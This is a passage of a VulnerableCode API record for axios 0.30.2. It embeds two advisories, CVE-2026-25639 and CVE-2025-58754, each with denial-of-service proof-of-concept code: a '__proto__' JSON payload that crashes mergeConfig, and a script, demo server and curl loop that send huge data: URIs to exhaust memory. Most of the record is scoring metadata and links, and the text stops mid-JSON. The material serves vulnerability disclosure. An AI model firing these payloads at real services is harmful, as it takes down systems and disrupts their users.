Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/68902?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/68902?format=api", "purl": "pkg:npm/axios@0.30.2", "type": "npm", "namespace": "", "name": "axios", "version": "0.30.2", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "0.30.3", "latest_non_vulnerable_version": "1.15.0", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20921?format=api", "vulnerability_id": "VCID-x41s-g5mh-pkdq", "summary": "Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig\n# Denial of Service via **proto** Key in mergeConfig\n\n### Summary\n\nThe `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.\n\n### Details\n\nThe vulnerability exists in `lib/core/mergeConfig.js` at lines 98-101:\n\n```javascript\nutils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {\n const merge = mergeMap[prop] || mergeDeepProperties;\n const configValue = merge(config1[prop], config2[prop], prop);\n (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);\n});\n```\n\nWhen `prop` is `'__proto__'`:\n\n1. `JSON.parse('{\"__proto__\": {...}}')` creates an object with `__proto__` as an own enumerable property\n2. `Object.keys()` includes `'__proto__'` in the iteration\n3. `mergeMap['__proto__']` performs prototype chain lookup, returning `Object.prototype` (truthy object)\n4. The expression `mergeMap[prop] || mergeDeepProperties` evaluates to `Object.prototype`\n5. `Object.prototype(...)` throws `TypeError: merge is not a function`\n\nThe `mergeConfig` function is called by:\n\n- `Axios._request()` at `lib/core/Axios.js:75`\n- `Axios.getUri()` at `lib/core/Axios.js:201`\n- All HTTP method shortcuts (`get`, `post`, etc.) at `lib/core/Axios.js:211,224`\n\n### PoC\n\n```javascript\nimport axios from \"axios\";\n\nconst maliciousConfig = JSON.parse('{\"__proto__\": {\"x\": 1}}');\nawait axios.get(\"https://httpbin.org/get\", maliciousConfig);\n```\n\n**Reproduction steps:**\n\n1. Clone axios repository or `npm install axios`\n2. Create file `poc.mjs` with the code above\n3. Run: `node poc.mjs`\n4. Observe the TypeError crash\n\n**Verified output (axios 1.13.4):**\n\n```\nTypeError: merge is not a function\n at computeConfigValue (lib/core/mergeConfig.js:100:25)\n at Object.forEach (lib/utils.js:280:10)\n at mergeConfig (lib/core/mergeConfig.js:98:9)\n```\n\n**Control tests performed:**\n| Test | Config | Result |\n|------|--------|--------|\n| Normal config | `{\"timeout\": 5000}` | SUCCESS |\n| Malicious config | `JSON.parse('{\"__proto__\": {\"x\": 1}}')` | **CRASH** |\n| Nested object | `{\"headers\": {\"X-Test\": \"value\"}}` | SUCCESS |\n\n**Attack scenario:**\nAn application that accepts user input, parses it with `JSON.parse()`, and passes it to axios configuration will crash when receiving the payload `{\"__proto__\": {\"x\": 1}}`.\n\n### Impact\n\n**Denial of Service** - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.\n\nAffected environments:\n\n- Node.js servers using axios for HTTP requests\n- Any backend that passes parsed JSON to axios configuration\n\nThis is NOT prototype pollution - the application crashes before any assignment occurs.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25639", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.15795", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.15798", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.1578", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.15744", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.1582", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.15889", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.15927", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16003", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.15802", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.1594", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.1595", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.15888", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16649", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25639" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639" }, { "reference_url": "https://github.com/axios/axios", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/axios/axios" }, { "reference_url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/" } ], "url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57" }, { "reference_url": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/" } ], "url": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e" }, { "reference_url": "https://github.com/axios/axios/pull/7369", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/" } ], "url": "https://github.com/axios/axios/pull/7369" }, { "reference_url": "https://github.com/axios/axios/pull/7388", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/" } ], "url": "https://github.com/axios/axios/pull/7388" }, { "reference_url": "https://github.com/axios/axios/releases/tag/v0.30.0", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/axios/axios/releases/tag/v0.30.0" }, { "reference_url": "https://github.com/axios/axios/releases/tag/v0.30.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/" } ], "url": "https://github.com/axios/axios/releases/tag/v0.30.3" }, { "reference_url": "https://github.com/axios/axios/releases/tag/v1.13.5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/" } ], "url": "https://github.com/axios/axios/releases/tag/v1.13.5" }, { "reference_url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/" } ], "url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907", "reference_id": "1127907", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237", "reference_id": "2438237", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237" }, { "reference_url": "https://github.com/advisories/GHSA-43fc-jf86-j433", "reference_id": "GHSA-43fc-jf86-j433", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-43fc-jf86-j433" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:10184", "reference_id": "RHSA-2026:10184", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:10184" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2694", "reference_id": "RHSA-2026:2694", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2694" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3087", "reference_id": "RHSA-2026:3087", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3087" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3105", "reference_id": "RHSA-2026:3105", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3105" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3106", "reference_id": "RHSA-2026:3106", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3106" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3107", "reference_id": "RHSA-2026:3107", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3107" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3109", "reference_id": "RHSA-2026:3109", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3109" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4942", "reference_id": "RHSA-2026:4942", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4942" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5142", "reference_id": "RHSA-2026:5142", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5142" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5168", "reference_id": "RHSA-2026:5168", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5168" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5174", "reference_id": "RHSA-2026:5174", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5174" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5636", "reference_id": "RHSA-2026:5636", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5636" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5665", "reference_id": "RHSA-2026:5665", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5665" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5807", "reference_id": "RHSA-2026:5807", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5807" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6170", "reference_id": "RHSA-2026:6170", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6170" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6174", "reference_id": "RHSA-2026:6174", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6174" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6192", "reference_id": "RHSA-2026:6192", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6192" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6277", "reference_id": "RHSA-2026:6277", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6277" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6308", "reference_id": "RHSA-2026:6308", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6308" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6309", "reference_id": "RHSA-2026:6309", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6309" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6404", "reference_id": "RHSA-2026:6404", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6404" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6428", "reference_id": "RHSA-2026:6428", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6428" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6497", "reference_id": "RHSA-2026:6497", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6497" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6567", "reference_id": "RHSA-2026:6567", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6567" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6568", "reference_id": "RHSA-2026:6568", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6568" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6802", "reference_id": "RHSA-2026:6802", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6802" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7249", "reference_id": "RHSA-2026:7249", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7249" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:8218", "reference_id": "RHSA-2026:8218", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:8218" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:8229", "reference_id": "RHSA-2026:8229", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:8229" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:8499", "reference_id": "RHSA-2026:8499", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:8499" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:8500", "reference_id": "RHSA-2026:8500", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:8500" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:8501", "reference_id": "RHSA-2026:8501", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:8501" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:9848", "reference_id": "RHSA-2026:9848", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:9848" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/62854?format=api", "purl": "pkg:npm/axios@0.30.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.30.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/631910?format=api", "purl": "pkg:npm/axios@1.0.0-alpha.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.0.0-alpha.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/62853?format=api", "purl": "pkg:npm/axios@1.13.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.13.5" } ], "aliases": [ "CVE-2026-25639", "GHSA-43fc-jf86-j433" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x41s-g5mh-pkdq" } ], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/25655?format=api", "vulnerability_id": "VCID-aq84-8cnz-byax", "summary": "Axios is vulnerable to DoS attack through lack of data size check\n## Summary\n\nWhen Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.\nThis path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.\n\n## Details\n\nThe Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob.\n\nRelevant code from [`[httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):\n\n```js\nconst fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);\nconst parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);\nconst protocol = parsed.protocol || supportedProtocols[0];\n\nif (protocol === 'data:') {\n let convertedData;\n if (method !== 'GET') {\n return settle(resolve, reject, { status: 405, ... });\n }\n convertedData = fromDataURI(config.url, responseType === 'blob', {\n Blob: config.env && config.env.Blob\n });\n return settle(resolve, reject, { data: convertedData, status: 200, ... });\n}\n```\n\nThe decoder is in [`[lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):\n\n```js\nexport default function fromDataURI(uri, asBlob, options) {\n ...\n if (protocol === 'data') {\n uri = protocol.length ? uri.slice(protocol.length + 1) : uri;\n const match = DATA_URL_PATTERN.exec(uri);\n ...\n const body = match[3];\n const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');\n if (asBlob) { return new _Blob([buffer], {type: mime}); }\n return buffer;\n }\n throw new AxiosError('Unsupported protocol ' + protocol, ...);\n}\n```\n\n* The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.\n* It does **not** honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams.\n* As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory.\n\nIn comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when `totalResponseBytes` exceeds [`[maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs.\n\n\n## PoC\n\n```js\nconst axios = require('axios');\n\nasync function main() {\n // this example decodes ~120 MB\n const base64Size = 160_000_000; // 120 MB after decoding\n const base64 = 'A'.repeat(base64Size);\n const uri = 'data:application/octet-stream;base64,' + base64;\n\n console.log('Generating URI with base64 length:', base64.length);\n const response = await axios.get(uri, {\n responseType: 'arraybuffer'\n });\n\n console.log('Received bytes:', response.data.length);\n}\n\nmain().catch(err => {\n console.error('Error:', err.message);\n});\n```\n\nRun with limited heap to force a crash:\n\n```bash\nnode --max-old-space-size=100 poc.js\n```\n\nSince Node heap is capped at 100 MB, the process terminates with an out-of-memory error:\n\n```\n<--- Last few GCs --->\n…\nFATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory\n1: 0x… node::Abort() …\n…\n```\n\nMini Real App PoC:\nA small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore `maxContentLength `, `maxBodyLength` and decodes into memory on Node before streaming enabling DoS.\n\n```js\nimport express from \"express\";\nimport morgan from \"morgan\";\nimport axios from \"axios\";\nimport http from \"node:http\";\nimport https from \"node:https\";\nimport { PassThrough } from \"node:stream\";\n\nconst keepAlive = true;\nconst httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });\nconst httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });\nconst axiosClient = axios.create({\n timeout: 10000,\n maxRedirects: 5,\n httpAgent, httpsAgent,\n headers: { \"User-Agent\": \"axios-poc-link-preview/0.1 (+node)\" },\n validateStatus: c => c >= 200 && c < 400\n});\n\nconst app = express();\nconst PORT = Number(process.env.PORT || 8081);\nconst BODY_LIMIT = process.env.MAX_CLIENT_BODY || \"50mb\";\n\napp.use(express.json({ limit: BODY_LIMIT }));\napp.use(morgan(\"combined\"));\n\napp.get(\"/healthz\", (req,res)=>res.send(\"ok\"));\n\n/**\n * POST /preview { \"url\": \"<http|https|data URL>\" }\n * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).\n */\n\napp.post(\"/preview\", async (req, res) => {\n const url = req.body?.url;\n if (!url) return res.status(400).json({ error: \"missing url\" });\n\n let u;\n try { u = new URL(String(url)); } catch { return res.status(400).json({ error: \"invalid url\" }); }\n\n // Developer allows using data:// in the allowlist\n const allowed = new Set([\"http:\", \"https:\", \"data:\"]);\n if (!allowed.has(u.protocol)) return res.status(400).json({ error: \"unsupported scheme\" });\n\n const controller = new AbortController();\n const onClose = () => controller.abort();\n res.on(\"close\", onClose);\n\n const before = process.memoryUsage().heapUsed;\n\n try {\n const r = await axiosClient.get(u.toString(), {\n responseType: \"stream\",\n maxContentLength: 8 * 1024, // Axios will ignore this for data:\n maxBodyLength: 8 * 1024, // Axios will ignore this for data:\n signal: controller.signal\n });\n\n // stream only the first 64KB back\n const cap = 64 * 1024;\n let sent = 0;\n const limiter = new PassThrough();\n r.data.on(\"data\", (chunk) => {\n if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }\n else { sent += chunk.length; limiter.write(chunk); }\n });\n r.data.on(\"end\", () => limiter.end());\n r.data.on(\"error\", (e) => limiter.destroy(e));\n\n const after = process.memoryUsage().heapUsed;\n res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n limiter.pipe(res);\n } catch (err) {\n const after = process.memoryUsage().heapUsed;\n res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n res.status(502).json({ error: String(err?.message || err) });\n } finally {\n res.off(\"close\", onClose);\n }\n});\n\napp.listen(PORT, () => {\n console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);\n console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);\n});\n```\nRun this app and send 3 post requests:\n```sh\nSIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString(\"base64\"); process.stdout.write(JSON.stringify({url:\"data:application/octet-stream;base64,\"+b}))' \\\n| tee payload.json >/dev/null\nseq 1 3 | xargs -P3 -I{} curl -sS -X POST \"$URL\" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```\n```\n\n---\n\n## Suggestions\n\n1. **Enforce size limits**\n For `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit.\n\n2. **Stream decoding**\n Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-58754", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00113", "scoring_system": "epss", "scoring_elements": "0.29896", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00113", "scoring_system": "epss", "scoring_elements": "0.29756", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00113", "scoring_system": "epss", "scoring_elements": "0.29944", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.34629", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.34669", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.34373", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.34392", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35614", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.3568", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35648", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35654", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35637", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35671", "published_at": "2026-04-09T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-58754" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754" }, { "reference_url": "https://github.com/axios/axios", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/axios/axios" }, { "reference_url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/" } ], "url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593" }, { "reference_url": "https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" 